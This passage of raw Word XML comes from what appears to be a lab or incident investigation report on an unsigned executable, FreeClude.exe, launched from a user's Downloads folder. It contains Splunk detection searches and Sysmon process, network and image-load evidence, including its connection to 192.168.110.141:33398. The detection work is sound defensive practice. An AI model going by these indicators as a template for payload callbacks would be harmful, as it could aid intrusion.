                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve"> + executable path + user + SHA256</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1344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1034076A">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t>Network communication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8460" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="25FF2B49">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FreeClude.exe</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve"> initiated a TCP connection from </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="20"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>192.168.110.156:55196</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve"> to </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="20"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>192.168.110.141:33398</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3A69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007E9EB2">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t>Network evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8460" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2B45175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Sysmon Event 3 + ProcessId </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="20"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>5568</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve"> + source/destination IP and port</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5674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74440A0D">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t>Image loading</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8460" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5E84AF65">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FreeClude.exe</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve"> was loaded and recorded as unsigned</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="522F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shd w:val="clear" w:color="auto" w:fill="4F81BD" w:themeFill="accent1"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0E9D794E">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t>Image evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8460" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="171B5AA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Sysmon Event 7 + </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="20"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>Signed: false</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve"> + SHA256 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="20"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>7673C78000C1DF5FDD6C863C494F2D00FC961C947F2B8ABD0E7BCC212765EBF1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="30128861">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A50C122">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Splunk: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>First-pass Payload Execution Search</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="12"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="96" w:type="dxa"/>
        <w:tblLayout w:type="autofit"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="108" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="108" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10052"/>
      </w:tblGrid>
      <w:tr w14:paraId="38902AB3">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="108" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="108" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10052" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="203A5B" w:sz="4" w:space="0"/>
              <w:left w:val="single" w:color="203A5B" w:sz="4" w:space="0"/>
              <w:bottom w:val="single" w:color="203A5B" w:sz="4" w:space="0"/>
              <w:right w:val="single" w:color="203A5B" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="0B1F33"/>
          </w:tcPr>
          <w:p w14:paraId="5150C9FA">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xml:space="preserve">index=_internal host="Sh-Win10" </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="592AF9F5">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xml:space="preserve">| search Image="*\\FreeClude.exe" </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DDB1D83">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>| table _time host User Image ParentImage ParentCommandLine CommandLine IntegrityLevel ProcessGuid ProcessId SHA256</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="38693BEA">
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17B0F24E">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Splunk: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Correlate Payload Execution with Network Activity</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="12"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="96" w:type="dxa"/>
        <w:tblLayout w:type="autofit"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="108" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="108" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10052"/>
      </w:tblGrid>
      <w:tr w14:paraId="4F915F31">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="108" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="108" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10052" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="203A5B" w:sz="4" w:space="0"/>
              <w:left w:val="single" w:color="203A5B" w:sz="4" w:space="0"/>
              <w:bottom w:val="single" w:color="203A5B" w:sz="4" w:space="0"/>
              <w:right w:val="single" w:color="203A5B" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="0B1F33"/>
          </w:tcPr>
          <w:p w14:paraId="484C9384">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xml:space="preserve">index=_internal host="Sh-Win10" (EventCode=1 OR EventCode=3) </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B2EF0AC">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xml:space="preserve">| search Image="*\\FreeClude.exe" OR (DestinationIp="192.168.110.141" DestinationPort=33398) </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DA94E2B">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">| table _time EventCode host User Image ProcessId SourceIp SourcePort DestinationIp DestinationPort ParentImage </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3BA0EAD8">
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E2CC35F">
      <w:pPr>
        <w:pStyle w:val="170"/>
        <w:spacing w:after="40"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Key supplied Sysmon evidence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0667968F">
      <w:pPr>
        <w:pStyle w:val="170"/>
        <w:spacing w:after="40"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="101E20CF">
      <w:pPr>
        <w:pStyle w:val="170"/>
        <w:spacing w:after="40"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Process Create (Event 1)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="12"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="autofit"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="108" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="108" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10118"/>
      </w:tblGrid>
      <w:tr w14:paraId="287EADE0">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78A5FA61">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>UtcTime: 2026-09-24 13:10:36.376</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D1E02E8">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0A4BE467">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Image: C:\Users\saada\Downloads\FreeClude.exe</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DD03A40">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CommandLine: "C:\Users\saada\Downloads\FreeClude.exe"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="434B507D">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CurrentDirectory: C:\Users\saada\Downloads</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CCDC2A5">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="144392E8">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ParentImage: C:\Windows\explorer.exe</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C22B3CA">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ParentCommandLine: C:\Windows\Explorer.EXE</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="432D6AF0">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3AB81651">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>User: SH-WIN10\saad</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="494CFC57">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>IntegrityLevel: High</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B50CBD6">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="10D1D9C7">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SHA256: 7673C78000C1DF5FDD6C863C494F2D00FC961C947F2B8ABD0E7BCC212765EBF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6E06E9FA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="742F0814">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Image Loaded (Event 7)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="12"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="autofit"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="108" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="108" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10118"/>
      </w:tblGrid>
      <w:tr w14:paraId="046A90C5">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7F75795F">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>UtcTime: 2026-09-24 13:10:36.414</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E68D3CB">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2E1BABA3">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Image: C:\Users\saada\Downloads\FreeClude.exe</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03939CD2">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ImageLoaded: C:\Users\saada\Downloads\FreeClude.exe</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15226364">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0D70B725">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Signed: false</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7277986C">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
